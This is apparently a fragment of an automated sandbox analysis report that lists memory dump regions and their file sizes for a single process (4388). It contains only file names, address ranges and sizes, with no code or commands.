                                                                          • memory/4388-77-0x00007FF957130000-0x00007FF95713D000-memory.dmp
                                                                            Filesize

                                                                            52KB

                                                                          • memory/4388-64-0x00007FF95CA80000-0x00007FF95CA8D000-memory.dmp
                                                                            Filesize

                                                                            52KB

                                                                          • memory/4388-69-0x00007FF94D710000-0x00007FF94D73E000-memory.dmp
                                                                            Filesize

                                                                            184KB

                                                                          • memory/4388-70-0x00007FF946CC0000-0x00007FF946D78000-memory.dmp
                                                                            Filesize

                                                                            736KB

                                                                          • memory/4388-72-0x00007FF946310000-0x00007FF946689000-memory.dmp
                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/4388-71-0x0000013731180000-0x00000137314F9000-memory.dmp
                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/4388-62-0x00007FF954860000-0x00007FF954879000-memory.dmp
                                                                            Filesize

                                                                            100KB

                                                                          • memory/4388-59-0x00007FF954880000-0x00007FF95489F000-memory.dmp
                                                                            Filesize

                                                                            124KB

                                                                          • memory/4388-60-0x00007FF946950000-0x00007FF946ACA000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/4388-56-0x00007FF956910000-0x00007FF956928000-memory.dmp
                                                                            Filesize

                                                                            96KB

                                                                          • memory/4388-54-0x00007FF9548C0000-0x00007FF9548EC000-memory.dmp
                                                                            Filesize

                                                                            176KB

                                                                          • memory/4388-47-0x00007FF9571C0000-0x00007FF9571E4000-memory.dmp
                                                                            Filesize

                                                                            144KB

                                                                          • memory/4388-25-0x00007FF946D80000-0x00007FF9471E6000-memory.dmp
                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/4388-300-0x00007FF9571C0000-0x00007FF9571E4000-memory.dmp
                                                                            Filesize

                                                                            144KB

                                                                          • memory/4388-315-0x00007FF946950000-0x00007FF946ACA000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/4388-314-0x00007FF954880000-0x00007FF95489F000-memory.dmp
                                                                            Filesize

                                                                            124KB

                                                                          • memory/4388-310-0x00007FF946310000-0x00007FF946689000-memory.dmp
                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/4388-309-0x00007FF946CC0000-0x00007FF946D78000-memory.dmp
                                                                            Filesize

                                                                            736KB

                                                                          • memory/4388-308-0x00007FF94D710000-0x00007FF94D73E000-memory.dmp
                                                                            Filesize

                                                                            184KB

                                                                          • memory/4388-306-0x00007FF954860000-0x00007FF954879000-memory.dmp
                                                                            Filesize

                                                                            100KB

                                                                          • memory/4388-299-0x00007FF946D80000-0x00007FF9471E6000-memory.dmp
                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/4388-325-0x00007FF94D710000-0x00007FF94D73E000-memory.dmp
                                                                            Filesize

                                                                            184KB

                                                                          • memory/4388-326-0x00007FF946CC0000-0x00007FF946D78000-memory.dmp
                                                                            Filesize

                                                                            736KB

                                                                          • memory/4388-339-0x00007FF95CA80000-0x00007FF95CA8D000-memory.dmp
                                                                            Filesize

                                                                            52KB

                                                                          • memory/4388-338-0x00007FF954860000-0x00007FF954879000-memory.dmp
                                                                            Filesize

                                                                            100KB

                                                                          • memory/4388-337-0x00007FF946950000-0x00007FF946ACA000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/4388-336-0x00007FF954880000-0x00007FF95489F000-memory.dmp
                                                                            Filesize

                                                                            124KB

                                                                          • memory/4388-335-0x00007FF956910000-0x00007FF956928000-memory.dmp
                                                                            Filesize

                                                                            96KB

                                                                          • memory/4388-334-0x00007FF9548C0000-0x00007FF9548EC000-memory.dmp
                                                                            Filesize

                                                                            176KB

                                                                          • memory/4388-333-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmp
                                                                            Filesize

                                                                            60KB

                                                                          • memory/4388-332-0x00007FF9571C0000-0x00007FF9571E4000-memory.dmp
                                                                            Filesize

                                                                            144KB

                                                                          • memory/4388-331-0x00007FF946D80000-0x00007FF9471E6000-memory.dmp
                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/4388-327-0x00007FF946310000-0x00007FF946689000-memory.dmp
                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/4388-330-0x00007FF943570000-0x00007FF943688000-memory.dmp
                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/4388-329-0x00007FF957130000-0x00007FF95713D000-memory.dmp
                                                                            Filesize

                                                                            52KB

                                                                          • memory/4388-328-0x00007FF9484C0000-0x00007FF9484D5000-memory.dmp
                                                                            Filesize

                                                                            84KB